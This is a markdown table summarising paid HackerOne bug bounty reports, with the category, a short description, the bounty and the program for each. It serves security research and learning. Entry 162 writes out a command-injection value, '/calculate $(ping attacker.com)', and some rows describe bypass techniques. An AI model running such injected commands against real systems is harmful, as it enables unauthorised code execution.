Summary of almost all paid bounty reports on H1
Open for contributions from others as well, so please send a pull request if you can!
| # | Category | Description | Bounty | Program | URL |
|---|---|---|---|---|---|
| 1 | IDOR | IDOR for order delivery address | $3000 | Mail.ru | https://hackerone.com/reports/723461 |
| 2 | IDOR | IDOR to change API-key description | $250 | Visma | https://hackerone.com/reports/809967 |
| 3 | SSRF | STUN SSRF | $3500 | Slack | https://hackerone.com/reports/333419 |
| 4 | SQLi | Blind SQLi through GET | $5000 | Mail.ru | https://hackerone.com/reports/786044 |
| 5 | SQLi | Blind SQLi through GET | $5000 | Mail.ru | https://hackerone.com/reports/795291 |
| 6 | SQLi | Blind SQLi through GET | $3000 | Mail.ru | https://hackerone.com/reports/732430 |
| 7 | SQLi | SQLi | $2200 | Mail.ru | https://hackerone.com/reports/738740 |
| 8 | SQLi | Blind Boolean based SQLi through GET | $300 | Mail.ru | https://hackerone.com/reports/398131 |
| 9 | Buffer Overflow | Buffer Overflow | $1750 | Valve | https://hackerone.com/reports/458929 |
| 10 | Buffer Overflow | Buffer Overflow | $10,000 | Valve | https://hackerone.com/reports/542180 |
| 11 | CSRF | CSRF in iOS app | $2940 | https://hackerone.com/reports/805073 | |
| 12 | Open redirect | Phishing Open Redirect | $560 | https://hackerone.com/reports/781673 | |
| 13 | DoS | DoS | $560 | https://hackerone.com/reports/767458 | |
| 14 | DoS | DoS | $560 | https://hackerone.com/reports/768677 | |
| 15 | Information leak | Private key disclosed | $2000 | Slack | https://hackerone.com/reports/531032 |
| 16 | Request Smuggling | Request Smuggling | $6500 | Slack | https://hackerone.com/reports/737140 |
| 17 | Account Takeover | Brute force account takeover via recovery code | $3000 | Mail.ru | https://hackerone.com/reports/730067 |
| 18 | Information leak | Arbitrary memory leak through API call | $10,000 | Mail.ru | https://hackerone.com/reports/513236 |
| 19 | XSS | Blind Stored XSS | $600 | Mail.ru | https://hackerone.com/reports/659760 |
| 20 | LFI (Information leak) | Local File Inclusion | $4000 | Starbucks | https://hackerone.com/reports/780021 |
| 21 | LFI | Arbitrary file inclusion & execution | $1000 | Valve | https://hackerone.com/reports/508894 |
| 22 | Information leak | Low impact information leak | $500 | HackerOne | https://hackerone.com/reports/826176 |
| 23 | Insufficient security controls | CORS misconfiguration | $1000 | SEMrush | https://hackerone.com/reports/235200 |
| 24 | Logic bug | Domain authority regex logic bug | $6000 | https://bugs.xdavidhu.me/google/2020/03/08/the-unexpected-google-wide-domain-check-bypass/ | |
| 25 | Privilege escalation | Abusing backup and restore function to escalate privileges | $1500 | Ubiquiti Inc | https://hackerone.com/reports/329659 |
| 26 | Privilege escalation | Arbritrary file deletion + DLL Hijacking leads to privilege escalation during install | $667 | Ubiquiti Inc | https://hackerone.com/reports/530967 |
| 27 | Information leak | Unauthenticated API endpoint leaking holiday schedule of employees in China | $4000 | Starbucks | https://hackerone.com/reports/659248 |
| 28 | Account takeover | Changing URL path from login to new-password allows merging victims store to attackers account | $7500 | Shopify | https://hackerone.com/reports/796956 |
| 29 | Improper access control | Unauthenticated API allows enumeration of user names & phone numbers | $500 | Razer | https://hackerone.com/reports/752443 |
| 30 | Authentication bypass | Auth bypass allowing access to support tickets | $1500 | Razer | https://hackerone.com/reports/776110 |
| 31 | Privilege escalation | Same as below, but change of email HAS to be completed before receiving the email verification request. Rewarded due to different root cause | $15,000 | Shopify | https://hackerone.com/reports/796808 |
| 32 | Privilege escalation | Takeover any shopify store by registering email, sending email verification request, changing email and confirming request chain | $15,000 | Shopify | https://hackerone.com/reports/791775 |
| 33 | Command injection | Abusing relative paths to run custom scripts during startup | $750 | Slack | https://hackerone.com/reports/784714 |
| 34 | Authentication bypass | View webcam and run code in context of any webpage in Safari | $75,000 | Apple | https://www.ryanpickren.com/webcam-hacking-overview |
| 35 | XSS | Stored XSS through chat message | $300 | Vanilla | https://hackerone.com/reports/683792 |
| 36 | IDOR | IDOR allows enumeration of users with connected google analytics or the amount of calendars owned by a single user | $500 | SEMrush | https://hackerone.com/reports/797685 |
| 37 | Logic Error | Negative values allowed for price parameters allowed for free goods | $2111 | SEMrush | https://hackerone.com/reports/771694 |
| 38 | XSS | Stored XSS in customer chat | $1000 | Shopify | https://hackerone.com/reports/798599 |
| 39 | XSS | XSS through FB Group integration | $500 | Shopify | https://hackerone.com/reports/267570 |
| 40 | SQLi | Error-based SQLi through GET | $1500 | Mail.ru | https://hackerone.com/reports/790005 |
| 41 | SSRF | Blind SSRF | $150 | Mail.ru | https://hackerone.com/reports/120298 |
| 42 | IDOR | Leaking order information due to IDOR (No PII, only bought items) | $150 | Mail.ru | https://hackerone.com/reports/791289 |
| 43 | Code injection | PHP injection through unserialize() leading to code execution | $3000 | Mail.ru | https://hackerone.com/reports/798135 |
| 44 | Subdomain Takeover | Dangling AWS Record allowed zone transfer, leading to access to cookies and CORS, which could facilitate phishing attacks | $500 | Uber | https://hackerone.com/reports/707748 |
| 45 | Logic Error | No validation that user rated his own trips, meaning drivers could alter their ratings. | $1500 | Uber | https://hackerone.com/reports/724522 |
| 46 | LFI | Using PDF-generator and an iframe, one could export the PDF with arbritrary file content | $500 | Visma | https://hackerone.com/reports/809819 |
| 47 | XSS | Dom XSS in IE & Edge on main page | $1000 | ForeScout Technologies | https://hackerone.com/reports/704266 |
| 48 | Logic Error | Overwrite data as low privilege user, by renaming existing folder to the name of a folder you do not have access to | $250 | NextCloud | https://hackerone.com/reports/642515 |
| 49 | Improper access control | Unauthenticated API allowed an attacker to change hostname of device | $550 | UniFi Cloud | https://hackerone.com/reports/802079 |
| 50 | SQLi | SQLi through multiple parameters, but in unused service. Data exfiltration possible. | $2000 | Razer | https://hackerone.com/reports/777698 |
| 51 | SQLi | SQLi through get parameter allowed for data exfiltration from Thai users. | $2000 | Razer | https://hackerone.com/reports/768195 |
| 52 | SQLi | SQLi allowing for access to data on Thai server. | $2000 | Razer | https://hackerone.com/reports/781205 |
| 53 | SSRF | SSRF that could have lead to compromise of server and significant data breach | $2000 | Razer | https://hackerone.com/reports/777664 |
| 54 | Information leak | PHP file with source code exposed. No exploit. | $200 | Razer | https://hackerone.com/reports/819735 |
| 55 | CSRF | CSRF token with 24h lifetime, leading to possibility of connecting attackers paypal with victims shopify account | $500 | Shopify | https://hackerone.com/reports/807924 |
| 56 | Code Injection | MacOS client is vulnerable to low-privilege attacker injecting code into the application using dylib. This is due to lack of setting the Hardened Runtime capability in XCODE | $250 | NextCloud | https://hackerone.com/reports/633266 |
| 57 | Information leak | Cleartext storage of API keys & tokens. Very poorly handled. | $750 | Zenly | https://hackerone.com/reports/753868 |
| 58 | Improper access control | AWS Bucket access key transmitted in cleartext | $300 | BCM Messenger | https://hackerone.com/reports/764243 |
| 59 | Improper access control | Able to add paid function for 14 days for free | $200 | Coda | https://hackerone.com/reports/777942 |
| 60 | XSS | Blind XSS in admin panel through a partner’s superuser name | $750 | Mail.ru | https://hackerone.com/reports/746497 |
| 61 | XSS | Blind XSS in admin panel through a partner’s superuser name (Same issue, different endpoint) | $750 | Mail.ru | https://hackerone.com/reports/746505 |
| 62 | SSRF | SSRF & Local File Read via photo upload | $6000 | Mail.ru | https://hackerone.com/reports/748128 |
| 63 | SSRF | SSRF & Local File Read via photo retrieving functionality | $6000 | Mail.ru | https://hackerone.com/reports/748069 |
| 64 | SSRF | SSRF & Local File Read via photo editor | $6000 | Mail.ru | https://hackerone.com/reports/748123 |
| 65 | Logic Error | A partner account with manager role could withdraw money from driver’s account | $8000 | Mail.ru | https://hackerone.com/reports/751347 |
| 66 | XSS | Reflected XSS through XML Namespace URI | $500 | Mapbox | https://hackerone.com/reports/780277 |
| 67 | Code Injection | HTML Injection for IE only | $500 | Mail.ru | https://hackerone.com/reports/757100 |
| 68 | DoS | Cache poisoning CORS allow origin header | $550 | Automattic | https://hackerone.com/reports/591302 |
| 69 | IDOR | Remote wipe of other users device | $500 | Nextcloud | https://hackerone.com/reports/819807 |
| 70 | SSRF | GitLab local instance SSRF bypass through DNS Rebinding in WebHooks | $3500 | GitLab | https://hackerone.com/reports/632101 |
| 71 | LFI | openStream called on java.net.URL allows access to local resources when passing in file:// or jar:// | $1800 | GitHub Security Lab | https://hackerone.com/reports/844327 |
| 72 | Logic Bug | Not checking if LINUX privilege is successfully dropped leads to increased attack surface | $1800 | GitHub Security Lab | https://hackerone.com/reports/845729 |
| 73 | SQLi | Arbitrary SQL queries via DocID parameter of Websocket API | $1800 | GitHub Security Lab | https://hackerone.com/reports/854439 |
| 74 | Logic Bug | Account takeover through link injection in contact form | $1000 | Insolar | https://hackerone.com/reports/786741 |
| 75 | Information leak | Ability to see other shops product title, only if they are using a particular app and has an attachment | $500 | Shopify | https://hackerone.com/reports/848625 |
| 76 | XSS | Reflected XSS on API Server (No regular users browsing the page) | $250 | Razer | https://hackerone.com/reports/791941 |
| 77 | Brute Force | Counter-specific (?) password was not protected against brute force attacks | $150 | Mail.ru | https://hackerone.com/reports/754536 |
| 78 | Authentication bypass | Knowing the victims phone number allowed access to partial information about the victims travel. Payment type, profile information, etc. | $8000 | Mail.ru | https://hackerone.com/reports/772118 |
| 79 | Information leak | API endpoint disclosed e-mails of subscribed users | $250 | Mail.ru | https://hackerone.com/reports/703086 |
| 80 | DoS | DoS & Unsafe Object creation through JSON parsing | $500 | Ruby | https://hackerone.com/reports/706934 |
| 81 | Logic Error | Session Expiration is not enforced during signup. Bypass can be done by deleting HTML element blocking progress | $100 | Visma | https://hackerone.com/reports/810400 |
| 82 | Subdomain Takeover | Subdomain takeover due to expired / unclaimed Hubspot instance | $2500 | Roblox | https://hackerone.com/reports/335330 |
| 83 | Information leak | Endpoint vulnerable to Heartbleed | $1500 | Uber | https://hackerone.com/reports/304190 |
| 84 | RCE | LFI through Path Traversal in image-tag in Markdown. Disclosure of local files leads to disclosure of secret, which can be used to achieve RCE through deserialization | $20,000 | GitLab | https://hackerone.com/reports/827052 |
| 85 | Prototype Pollution | Simple prototype pollution due to improper handling of zipObjectDeep | $250 | Node.js Third Party Modules (lodash) | https://hackerone.com/reports/712065 |
| 86 | Information disclosure | Session is not properly invalidated after logging out. When creating a store before upgrading your account, visitors are required to enter a password. This password is disclosed after logging out, when visiting a certain link. | $500 | Shopify | https://hackerone.com/reports/837729 |
| 87 | IDOR | Able to bypass ban restrictions through path normalization. APIs are also unrestricted | $800 | Roblox | https://hackerone.com/reports/703058 |
| 88 | Phishing | Link url falsification by altering post message | $250 | Slack | https://hackerone.com/reports/481472 |
| 89 | Information leak | Leaking (unrestricted?) Google API key | $150 | Identify | https://hackerone.com/reports/724039 |
| 90 | Improper access control | Read-only team members can read all properties of webhooks, through graphql | $0 | HackerOne | https://hackerone.com/reports/818848 |
| 91 | DoS | DoS through sending large message to the server | $500 | Roblox | https://hackerone.com/reports/679907 |
| 92 | IDOR | Access to log files based on IDOR through exposed signature in Razer Pay Android App | $500 | Razer | https://hackerone.com/reports/754044 |
| 93 | Path Traversal | Misconfiguration when handling URI paths allowed for docroot path traversal giving access to non-sensitive data usually not accessible to users | $500 | Starbucks | https://hackerone.com/reports/844067 |
| 94 | Improper Certificate Validation | Client side traffic hijacking allowed for user data interception (Local?) | $750 | Razer | https://hackerone.com/reports/795272 |
| 95 | Improper authorization | The Razer Pay backend server could be exploited to obtain transaction details from another user | $500 | Razer | https://hackerone.com/reports/754339 |
| 96 | SQLi | Razer Pay API was vulnerable to SQLi exposing user information | $2000 | Razer | https://hackerone.com/reports/811111 |
| 97 | Improper authorization | Reverse engineering the Android app allowed for bypassing the signatures in place to prevent parameter tampering, discovering a variety of IDOR issues | $1000 | Razer | https://hackerone.com/reports/753280 |
| 98 | HTTP Response Splitting | Limited CRLF injection allowed for manipulation of cookies | $150 | Mail.ru | https://hackerone.com/reports/838682 |
| 99 | IDOR | Issue with the marketplace due to length restriction in choosing hashing function | $5000 | SEMrush | https://hackerone.com/reports/837400 |
| 100 | SSRF | SSRF & LFI in Site Audit due to lack of connection protocol verification | $2000 | SEMrush | https://hackerone.com/reports/794099 |
| 101 | SSL Downgrade | Possible to temporarily downgrade a victim from HTTPS to HTTP in Firefox. Required victim clicking a link and had a very short timeframe to be successful | $500 | Uber | https://hackerone.com/reports/221955 |
| 102 | XSS | Reflected XSS due to outdated Wordpress installation lead to exposure of sensitive form data and user data | $4000 | Uber | https://hackerone.com/reports/340431 |
| 103 | Open Redirect | Open redirect in get parameter | $50 | Unikrn | https://hackerone.com/reports/625546 |
| 104 | DoS | Bypassing character limitation on ´Moments´ feature and creating many of them leads to DoS | $560 | https://hackerone.com/reports/819088 | |
| 105 | CRLF Injection | CRLF injection in urllib | $1000 | Python (IBB) | https://hackerone.com/reports/590020 |
| 106 | Subdomain Takeover | Out of scope, no impact subdomain takeover of uptimerobot page | $100 | BTFS | https://hackerone.com/reports/824909 |
| 107 | SQLi | Blind Boolean-based SQLi in Razer Gold TH | $1000 | Razer | https://hackerone.com/reports/790914 |
| 108 | SSRF | SSRF allowing port scanning of localhost through host header injection | $300 | TTS Bug Bounty | https://hackerone.com/reports/272095 |
| 109 | Cryptographic Issues | A variety of WPA3 issues related to cryptography and logic | $750 | The Internet | https://hackerone.com/reports/745276 |
| 110 | XSS | Reflected XSS on resources.hackerone.com | $500 | HackerOne | https://hackerone.com/reports/840759 |
| 111 | Information leak | Un-minified JS code disclosed on some pages | $250 | Imgur | https://hackerone.com/reports/845677 |
| 112 | XSS | Self-XSS to normal XSS by bypassing X-Frame-Options to automatically execute JS through loading content through iframes | $250 | Pornhub.com | https://hackerone.com/reports/761904 |
| 113 | IDOR | A partner account could access another partner’s driver data through an IDOR | $1500 | mail.ru | https://hackerone.com/reports/747612 |
| 114 | IDOR | A partner account could access information about other partners through an IDOR | $1500 | mail.ru | https://hackerone.com/reports/746513 |
| 115 | IDOR | A partner with manager role could takeover a drive’s account belonging to a different partner | $8000 | mail.ru | https://hackerone.com/reports/751281 |
| 116 | XSS | Stored XSS on messages to drivers through the operator interface | $500 | mail.ru | https://hackerone.com/reports/751263 |
| 117 | Code Execution | PHP Code Execution through image upload functionality | $3000 | mail.ru | https://hackerone.com/reports/854032 |
| 118 | Improper Access Control | Delete projects from archived companies set to Read-Only. | $100 | Visma | https://hackerone.com/reports/849157 |
| 119 | Information leak | Account takeover due to leaking auth URLs on google & leaking OTP in API response | $500 | Badoo | https://hackerone.com/reports/746186 |
| 120 | XSS | Stored XSS through file upload (.pdf → JS) | $250 | Visma | https://hackerone.com/reports/808862 |
| 121 | Information leak | 404-page leaks all headers | $500 | HackerOne | https://hackerone.com/reports/792998 |
| 122 | CSRF | Friends Only account mode could be toggled through CSRF | $250 | Mail.ru | https://hackerone.com/reports/448928 |
| 123 | Subdomain Takeover | Possible due to wildcard pointing to uberflip domain | $500 | HackerOne | https://hackerone.com/reports/863551 |
| 124 | DoS | Improper error handling leads to DoS and service failure in case of supplying invalid “Redirect_URI” parameter | $1000 | GitLab | https://hackerone.com/reports/702987 |
| 125 | Information leak | Private program invites can disclose emails of any user invited by using username | $7500 | HackerOne | https://hackerone.com/reports/807448 |
| 126 | SSRF | SSRF through notification configuration. Requires admin privileges | $300 | Phabricator | https://hackerone.com/reports/850114 |
| 127 | Improper Access Control | Read-only user without access to payroll, can still access the data by visiting the URL directly | $250 | Visma | https://hackerone.com/reports/838563 |
| 128 | XSS | Code does not sufficiently escape template expressions, allowing for XSS | $500 | Ruby On Rails | https://hackerone.com/reports/474262 |
| 129 | Information leak | Potentially sensitive information leaked through debug interface | $150 | Mail.ru | https://hackerone.com/reports/748925 |
| 130 | Misconfiguration | Network restrictions on admin interface could be bypassed using alternate hostnames | $150 | Mail.ru | https://hackerone.com/reports/749677 |
| 131 | Request Smuggling | Request smuggling poisoning users using Host header injection | $750 | TTS | https://hackerone.com/reports/726773 |
| 132 | Lack of security mechanisms | Lack of user warning when opening potentially dangerous files from the chat window | $250 | Mail.ru | https://hackerone.com/reports/633600 |
| 133 | XSS | Reflected XSS in investor relations website due to unsanitized user input | $350 | Razer | https://hackerone.com/reports/801075 |
| 134 | SQLi | Blind SQLi due to no input sanitization on “Top Up” function in Razer Gold TH service | $1000 | Razer | https://hackerone.com/reports/789259 |
| 135 | Subdomain Takeover | Subdomain takeover | $250 | Razer | https://hackerone.com/reports/810807 |
| 136 | Open redirect | Open redirect in login flow | $150 | TTS | https://hackerone.com/reports/798742 |
| 137 | Race Condition | Race condition in email verification that awards in-game currency, leading to similar impact as payment bypass | $2000 | InnoGames | https://hackerone.com/reports/509629 |
| 138 | Account Takeover | Links on in-game forum leaks referer header, which contains CSRF token. The page also embeds links with the cookie value on the page. Utilizing self-xss combined with CSRF-token, you can grab cookie from DOM and send it to attacker resulting in Account Takeover | $1100 | InnoGames | https://hackerone.com/reports/604120 |
| 139 | XSS | Reflected XSS due to insufficient input sanitation. Could allow for account takeover or user session manipulation. | $1900 | PayPal | https://hackerone.com/reports/753835 |
| 140 | XSS | Stored XSS through bypass of file type upload limit by 0-byte. Uploading a xx.html%00.pdf with JS will work like a stored XSS when accessed | $250 | Visma | https://hackerone.com/reports/808821 |
| 141 | Improper Authentication | An issue in how Cloudflare’s authoritative DNS server processes requests with “:” in it. This allows an attacker to spoof NXDOMAINs within safe zones. | $400 | Open-Xchange | https://hackerone.com/reports/858854 |
| 142 | Improper Access Control | Can reply or delete replies from any users in any public group, without joining said group. (Buddypress) | $225 | WordPress | https://hackerone.com/reports/837256 |
| 143 | Privilege Escalation | Author role has access to edit, trash and add new items within the BuddyPress Emails. | $225 | WordPress | https://hackerone.com/reports/833782 |
| 144 | CSRF | Profile field CSRF allows for deleting any field in BuddyPress | $225 | WordPress | https://hackerone.com/reports/836187 |
| 145 | Privilege Escalation | IDOR + Changing parameter from “Moderator” to “Admin” leads to privilege escalation | $225 | WordPress | https://hackerone.com/reports/837018 |
| 146 | Privilege Escalation | Chaining 5 vulnerabilities leads to privilege to root, by: Symlink attack combined with race condition leads to executing malicious code | $500 | NordVPN | https://hackerone.com/reports/767647 |
| 147 | XSS | Reflected XSS evading WAF + confirming insufficient fix | $1000 | Glassdoor | https://hackerone.com/reports/846338 |
| 148 | Information leak | New retest functionality discloses existence of private programs through having the tag added to the program description | $500 | HackerOne | https://hackerone.com/reports/871142 |
| 149 | XSS | Outdated PDF.js allows for XSS using CVE-2018-5158 | $100 | Nextcloud | https://hackerone.com/reports/819863 |
| 150 | DoS | DoS due to having a large amount of groups and sending a tampered request (Changed Accept-Encoding & User-Agent) | $500 | HackerOne | https://hackerone.com/reports/861170 |
| 151 | XSS | Stored XSS in user profile | $200 | QIWI | https://hackerone.com/reports/365093 |
| 152 | Logic Bug | Service time expiry validation bypass leads to unlimited use due to bypassing licensing time checks | $400 | NordVPN | https://hackerone.com/reports/865828 |
| 153 | Improper Access Control | Privilege escalation through improper access control on /membership/ endpoint | $500 | Helium | https://hackerone.com/reports/809816 |
| 154 | IDOR | Sending invitations is vulnerable to IDOR attack, resulting in being able to invite any account as administrator of a organization, by knowing the organizations UUID | $100 | Helium | https://hackerone.com/reports/835005 |
| 155 | Improper Access Control | Dcoker Registry API v2 exposed through HTTP, allowing for dumping & poisoning of docker images. | $2000 | Semmle | https://hackerone.com/reports/347296 |
| 156 | Code Injection | CodeQL query to detect JNDI injections | $2300 | GitHub | https://hackerone.com/reports/892465 |
| 157 | Information leak | GraphQL query can disclose information about undisclosed reports to the HackerOne program due to the retest feature | $2500 | HackerOne | https://hackerone.com/reports/871749 |
| 158 | Logic Bug | CodeQL query to detect improper URL handling | $1800 | GitHub | https://hackerone.com/reports/891268 |
| 159 | Information leak | CodeQL query to detect Spring Boot actuator endpoints | $1800 | GitHub | https://hackerone.com/reports/891266 |
| 160 | Logic Bug | CodeeQL query to detect incorrect conversion between numeric types in GOLang | $1800 | GitHub | https://hackerone.com/reports/891265 |
| 161 | Improper Access Control | Certain API methods were not properly restricted and leaked statistics about arbitrary domains | $400 | Mail.ru | https://hackerone.com/reports/831663 |
| 162 | Code Injection | Using chat commands functions like “/calculate 1+1” is possible, but it can be abused by using BASH syntax for executing commands “/calculate $(ping attacker.com)”, leading to arbitrary code execution | $3000 | Nextcloud | https://hackerone.com/reports/851807 |
| 163 | Privilege Escalation | Can invite members to a “clan” even when the user does not have access to that function | $550 | InnoGames | https://hackerone.com/reports/511275 |
| 164 | XSS | AirMax software was vulnerable to Reflected XSS on multiple end-points and parameters | $150 | Ubiquiti inc. | https://hackerone.com/reports/386570 |
| 165 | Privilege Escalation | Changing email parameter allows privilege escalation to admin | $100 | Helium | https://hackerone.com/reports/813159 |
| 166 | Information leak | CodeQL query to detect logging of sensitive data | $500 | GitHub | https://hackerone.com/reports/886287 |
| 167 | CSRF | CSRF is possible in the AirMax software on multiple endpoints leading to possible firmware downgrade, config modification, file or token ex-filtration etc. | $1100 | Ubiquiti inc. | https://hackerone.com/reports/323852 |
| 168 | Account Takeover | No brute-force protection on SMS verification endpoint lead to account takeover | $1700 | Mail.ru | https://hackerone.com/reports/744662 |
| 169 | IDOR | API allowed for leaking information on job seekers / employers through IDOR | $500 | Mail.ru | https://hackerone.com/reports/743687 |
| 170 | XSS | Reflected XSS through URI on 404 page | $300 | Mail.ru | https://hackerone.com/reports/797717 |
| 171 | SSRF | SSRF through using functionality from included library that should be disabled | $10,000 | GitLab | https://hackerone.com/reports/826361 |
| 172 | Information leak | Insufficient verification leads to ability to read sensitive files | $10,000 | GitLab | https://hackerone.com/reports/850447 |
| 173 | Improper Authentication | Could impersonate and answer tickets belonging to other users | $550 | InnoGames | https://hackerone.com/reports/876573 |
| 174 | Subdomain Takeover | Subdomain takeover of iosota.razersynapse.com | $200 | Razer | https://hackerone.com/reports/813313 |
| 175 | XSS | Reflected xss through cookies on ftp server for Thai employees | $375 | Razer | https://hackerone.com/reports/748217 |
| 176 | XSS | Out of scope DOM XSS leading to impact on account security for in scope asset. Only applicable to IE and Edge. | $750 | Rockstar Games | https://hackerone.com/reports/663312 |
| 177 | SQLi | Search function was crashable disclosing error logs with useful information for other potential attacks. | $250 | Rockstar Games | https://hackerone.com/reports/808832 |
| 178 | Open Redirect | Could potentially leak sensitive tokens through referer header on GTA Online sub-site. | $750 | Rockstar Games | https://hackerone.com/reports/798121 |
| 179 | XSS | DOM XSS in GTA Online feedback endpoint. Other issues with the same root cause was also found on the same site. | $1250 | Rockstar Games | https://hackerone.com/reports/803934 |
| 180 | DoS | In email verification emails, the unique number is assigned sequentially, meaning you can invalidate all future registrations by visiting the following URL. Ex: confirmmail/1/jfaiu -> confirmmail/2/jfaiu | $150 | Vanilla | https://hackerone.com/reports/329209 |
| 181 | Information leak | External images could be referenced in the screenshot utility feature, possibly leading to FaceBook OAUTH token theft | $500 | Rockstar Games | https://hackerone.com/reports/497655 |
| 182 | XSS | Dom XSS on main page achieved through multiple minor issues, like path traversal and open redirect | $850 | Rockstar Games | https://hackerone.com/reports/475442 |
| 183 | XSS | Stored XSS through demo function in multiple parameters using javascript scheme | $750 | Shopify | https://hackerone.com/reports/439912 |
| 184 | Improper access control | After removing admin access from an account, it can still make changes with admin permissions until logged out. The account can also still make changes to embedded apps, but this is by design. | $1000 | Shopify | https://hackerone.com/reports/273099 |
| 185 | CSRF | Account takeover on social club by using CSRF to link an account to the attackers facebook account, leading to the ability to login as the victim | $1000 | Rockstar Games | https://hackerone.com/reports/474833 |
| 186 | XSS | Reflected XSS due to decoding and executing code after the last “/” on GTAOnline/jp. | $750 | Rockstar Games | https://hackerone.com/reports/507494 |
| 187 | Open Redirect | Open Redirect on the support page, impacting the mobile page | $750 | Rockstar games | https://hackerone.com/reports/781718 |
| 188 | XSS | DOM XSS on GTAOnline. Regressed Directory Traversal and new XSS issue | $750 | Rockstar games | https://hackerone.com/reports/479612 |
| 189 | Race Condition (TOCTOU) | Can click “This Rocks” (like) button any number of times, allowing an attacker to fill up the victims notification feed | $250 | Rockstar games | https://hackerone.com/reports/474021 |
| 190 | XSS | DOM XSS in the video section of GTAOnline page through returnurl-parameter, only exploitable on non-English versions. | $750 | Rockstar games | https://hackerone.com/reports/505157 |
| 191 | CSRF | CSRF on login page only, due to processing credentials before checking for CSRF protections. This is also only valid when forcing non 4xx responses from the server | $500 | HackerOne | https://hackerone.com/reports/834366 |
| 192 | RCE | RCE Through Blind SQLI in Where clause | $5500 | QIWI | https://hackerone.com/reports/816254 |
| 193 | RCE | RCE Through Blind SQLI in Where clause | $1000 | QIWI | https://hackerone.com/reports/816560 |
| 194 | RCE | RCE through Blind SQLI in prepared statement | $1000 | QIWI | https://hackerone.com/reports/816086 |
| 195 | IDOR | Read-only user can change name of device in admin account | $50 | Helium | https://hackerone.com/reports/865115 |
| 196 | Path Traversal | Access to restricted data through path traversal (requires valid authentication cookie) | $4000 | Starbucks | https://hackerone.com/reports/876295 |
| 197 | XSS | Combining two minor harmless injections results in dom based Reflected XSS | $250 | Starbucks | https://hackerone.com/reports/396493 |
| 198 | XSS | Bypass of previous issue by encoding “ as %2522 | $250 | Starbucks | https://hackerone.com/reports/252908 |
| 199 | SQLi | Blind, time-based SQLi due to unsafe handling of GET parameter | $15,000 | Mail.ru | https://hackerone.com/reports/868436 |
| 200 | SSRF | By being able to redirect key lookups (since they are on your own domain and the lookup is done over DNS), you can trick the sending server into accessing arbitrary addresses. | $400 | Open-Xchange | https://hackerone.com/reports/792960 |
| 201 | SSRF | Same as 201 but through different code. Being able to control DNS records for your own domain, you can redirect servers accessing your domain to get your public key into returning data from an internal asset. | $400 | Open-Xchange | https://hackerone.com/reports/792953 |
| 202 | XSS | DOM XSS through XSS payload in UID field of key. Exploited by sending key to the victim, which then imports it. | $500 | Open-Xchange | https://hackerone.com/reports/788691 |
| 203 | Information disclosure | Attacker can leak OAUTH token due to redirect_uri not properly detecting IDN Homograph attacks (Unicode character confusion attack - é = e) | $1000 | SEMrush | https://hackerone.com/reports/861940 |
| 204 | DoS | DoS through no length restriction on the “instruction” field when creating a new program. | $2500 | HackerOne | https://hackerone.com/reports/887321 |
| 205 | CSRF | CSRF token is not checked | $250 | Visma | https://hackerone.com/reports/878443 |
| 206 | Path Traversal | By executing a path traversal attack on the frontend, arbitrary API calls on the (internal only) backend was possible. This lead to being able to enumerate 100 million real users. | $4000 | Starbucks | https://samcurry.net/hacking-starbucks/ |
| 207 | Privacy Violation | Incorrect usage of Google AD ID integration lead to privacy issue | $200 | NordVPN | https://hackerone.com/reports/803941 |
| 208 | Insecure design principles | Including vendor based eval-stdin.php leads to potential RCE | $100 | NextCloud | https://hackerone.com/reports/820146 |
| 209 | CSRF | Lack of CSRF protection when linking FaceBook account with Social Club account, lead to potential takeover. Required preconditions and deception to succeed. | $550 | Rockstar Games | https://hackerone.com/reports/653254 |
| 210 | Information Disclosure | a chain of vulnerabilities leads to being able to possibly exfiltrate user tokens. One part was image injection in Screenshot-View function. | $500 | Rockstar Games | https://hackerone.com/reports/655288 |
| 211 | Information Disclosure | Image injection in www.rockstargames.com/bully/screens could be combined with other minor issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/661646 |
| 212 | XSS | DOM XSS in localized (different languages) Red Dead Redemption 2 video viewer. www.rockstargames.com/reddeadredemption2/br/videos | $750 | Rockstar Games | https://hackerone.com/reports/488108 |
| 213 | CSRF | CSRF issue in language changing function for GTA Online could be chained with other vulnerabilities to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/809691 |
| 214 | Information Disclosure | Image injection on www.rockstargames.com/bully/anniversaryedition. Could be combined with other issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/498358 |
| 215 | Information Disclosure | Image injection-fix bypass in the screenshot-viewer utility | $500 | Rockstar Games | https://hackerone.com/reports/505259 |
| 216 | Information Disclosure | Another Image injection-fix bypass in the screenshot-viewer utility | $500 | Rockstar Games | https://hackerone.com/reports/506126 |
| 217 | XSS | Flash file based Open Redirect and XSS vulnerability. | $500 | Rockstar Games | https://hackerone.com/reports/485382 |
| 218 | Open Redirect | Open Redirect in changing language functionality on https://www.rockstargames.com/GTAOnline. This could be used to leak sensitive tokens from the URL through Referer header. | $500 | Rockstar Games | https://hackerone.com/reports/870062 |
| 219 | XSS | Localized (different languages) versions of https://www.rockstargames.com/GTAOnline/ was vulnerable to DOM XSS in various locations. This combined with Open Redirect allowed for user token exfiltration. | $750 | Rockstar Games | https://hackerone.com/reports/508517 |
| 220 | Information Disclosure | Image injection on localized (different languages) versions of games/info endpoint (https://www.rockstargames.com/br/#/games/info). This could lead to leaking user tokens through Referer header. | $500 | Rockstar Games | https://hackerone.com/reports/510388 |
| 221 | Information Disclosure | Attack chain leading to leaking OAUTH tokens. Image injection in https://www.rockstargames.com/bully/anniversaryedition combined with other minor issues allowed for this attack to be successful. | $500 | Rockstar Games | https://hackerone.com/reports/659784 |
| 222 | XSS | DOM XSS in localized versions of GTA Online screenshot site, like the following: https://www.rockstargames.com/GTAOnline/jp/screens/ | $750 | Rockstar Games | https://hackerone.com/reports/508475 |
| 223 | XSS | DOM XSS in www.rockstargames.com/GTAOnline/features/freemode | $750 | Rockstar Games | https://hackerone.com/reports/799739 |
| 224 | Improper Authentication | Host(origin) checking of Digits SDK passes attacker controlled string to function expecting regex, leading to using regex-specific characters in the domain name allowing for bypassing the check. (“.” matching any character). The impact was account takeover. | $5040 | https://hackerone.com/reports/129873 | |
| 225 | CSRF | User token leak through referer header, by abusing vulnerable chain of issues. This was due to insufficient refer header policy. The url was extracted through abusing an Open Redirect issue. The vulnerable endpoint was socialclub.rockstargames.com/crew/ | $750 | Rockstar Games | https://hackerone.com/reports/787160 |
| 226 | CSRF | Leaking user tokens through referer header by exploiting a chain of issues. The part handled in this report is Image injection leading to XSS on https://www.rockstargames.com/newswire/article | $750 | Rockstar Games | https://hackerone.com/reports/790465 |
